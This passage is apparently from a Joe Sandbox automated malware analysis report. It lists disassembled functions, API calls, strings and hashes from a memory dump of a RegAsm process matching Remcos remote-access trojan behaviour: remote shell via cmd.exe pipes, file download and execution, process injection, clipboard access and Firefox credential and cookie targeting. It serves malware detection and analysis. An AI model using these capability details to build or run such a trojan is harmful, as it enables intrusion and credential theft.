                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 806969131-0
                                                                                                                                                                                                  • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                                  • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 806969131-0
                                                                                                                                                                                                  • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                                                                                  • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
APIs
  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
  • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
  • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
• CloseHandle.KERNEL32(004040F5), ref: 004185B9
• CloseHandle.KERNEL32(00465E84), ref: 004185C2
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
• String ID:
• API String ID: 2948481953-0
• Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
• Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
• Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
• Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
APIs
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: __crt_fast_encode_pointer
• String ID:
• API String ID: 3768137683-0
• Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
• Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
• Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
• Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
• Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
• Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
• Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
APIs
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __alldvrm
• String ID:
• API String ID: 65215352-0
• Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
• Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
• Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
• Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
APIs
• RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
• Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
• Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
• Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
APIs
• WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
• Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
• Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
• Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
APIs
• std::_Deallocate.LIBCONCRT ref: 00402E2B
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Deallocatestd::_
• String ID:
• API String ID: 1323251999-0
• Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
• Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
• Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
• Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
APIs
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
APIs
• VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• SetEvent.KERNEL32(?,?), ref: 00407CF4
• GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
• DeleteFileW.KERNEL32(00000000), ref: 00407DE4
  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
• GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
• DeleteFileA.KERNEL32(?), ref: 0040868D
  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
• Sleep.KERNEL32(000007D0), ref: 00408733
• StrToIntA.SHLWAPI(00000000), ref: 00408775
  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
• String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
• API String ID: 1067849700-181434739
APIs
• __Init_thread_footer.LIBCMT ref: 004056E6
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• __Init_thread_footer.LIBCMT ref: 00405723
• CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
• CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
• Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
• PeekNamedPipe.KERNEL32 ref: 004058BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
• Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
• TerminateProcess.KERNEL32(00000000), ref: 00405A17
• CloseHandle.KERNEL32 ref: 00405A23
• CloseHandle.KERNEL32 ref: 00405A2B
• CloseHandle.KERNEL32 ref: 00405A3D
• CloseHandle.KERNEL32 ref: 00405A45
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
• API String ID: 2994406822-18413064
APIs
• GetCurrentProcessId.KERNEL32 ref: 00412141
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
• OpenMutexA.KERNEL32 ref: 00412181
• CloseHandle.KERNEL32(00000000), ref: 00412190
• CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                                                                  • API String ID: 3018269243-13974260
                                                                                                                                                                                                  • Opcode ID: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                                                                                                                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                  • API String ID: 1164774033-3681987949
                                                                                                                                                                                                  • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 004168FD
                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                                                  • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                                  • String ID: !D@
                                                                                                                                                                                                  • API String ID: 3520204547-604454484
                                                                                                                                                                                                  • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                                                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                  • API String ID: 3527384056-432212279
                                                                                                                                                                                                  • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 297527592-0
                                                                                                                                                                                                  • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                                                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
• Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
